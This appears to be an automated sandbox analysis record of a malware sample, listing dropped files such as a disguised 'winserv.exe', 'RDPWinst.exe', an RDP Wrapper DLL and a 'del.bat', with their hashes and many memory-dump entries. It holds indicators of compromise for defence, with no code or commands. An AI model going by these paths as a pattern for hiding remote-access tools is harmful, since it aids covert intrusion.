C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/3212-132-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/4992-135-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\settings.dat
| MD5 | 483fc2e7373a9ee36cc444fca67a32a8 |
| SHA1 | c2fe2355683b670622a8e00784bec5056291e494 |
| SHA256 | 2ee9e47fc7edee23653ee17475e0f040255aad1be11cfcec389335078561944d |
| SHA512 | e3b1cf539e5a542e0cab0ac9122e6027a5d489f0ac89a67070ad21ef7611010122ff2fad8d7d1d7fd6256bdb84e404a7eb8ef31bd86b0162b82c92d49af0a7e4 |
memory/4068-138-0x0000000000000000-mapping.dmp
memory/4364-139-0x0000000000000000-mapping.dmp
memory/2040-140-0x0000000000000000-mapping.dmp
memory/1208-141-0x0000000000000000-mapping.dmp
memory/4904-142-0x0000000000000000-mapping.dmp
memory/4028-143-0x0000000000000000-mapping.dmp
memory/1924-144-0x0000000000000000-mapping.dmp
memory/2116-145-0x0000000000000000-mapping.dmp
memory/3832-146-0x0000000000000000-mapping.dmp
memory/608-147-0x0000000000000000-mapping.dmp
memory/4908-148-0x0000000000000000-mapping.dmp
memory/3436-149-0x0000000000000000-mapping.dmp
memory/3116-150-0x0000000000000000-mapping.dmp
memory/3208-151-0x0000000000000000-mapping.dmp
memory/2512-152-0x0000000000000000-mapping.dmp
memory/4472-153-0x0000000000000000-mapping.dmp
memory/672-154-0x0000000000000000-mapping.dmp
memory/552-155-0x0000000000000000-mapping.dmp
memory/836-156-0x0000000000000000-mapping.dmp
memory/1096-157-0x0000000000000000-mapping.dmp
memory/3672-158-0x0000000000000000-mapping.dmp
memory/548-159-0x0000000000000000-mapping.dmp
C:\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
C:\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
\??\c:\program files\rdp wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
C:\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/4048-164-0x0000000000000000-mapping.dmp
memory/4164-165-0x0000000000000000-mapping.dmp
C:\Programdata\Install\del.bat
| MD5 | 49a9fec3ba20596a39e2bfae59ff4b3c |
| SHA1 | b9cc7369a94831b912ed85532d7cc99f32c82040 |
| SHA256 | 3a85f338cd09aefe830c7b8bac225e3d8d847b7184ecfb625ad7f46492dba681 |
| SHA512 | e5174539967fbc5dd1a4cec7d7a868c45ff58906fd2e580ba49a82b0ff6fabfb0564678d3aca37e86f9124776d7aba6c65fa0f72219e0474adcb9dc8e7484bea |
memory/5036-167-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |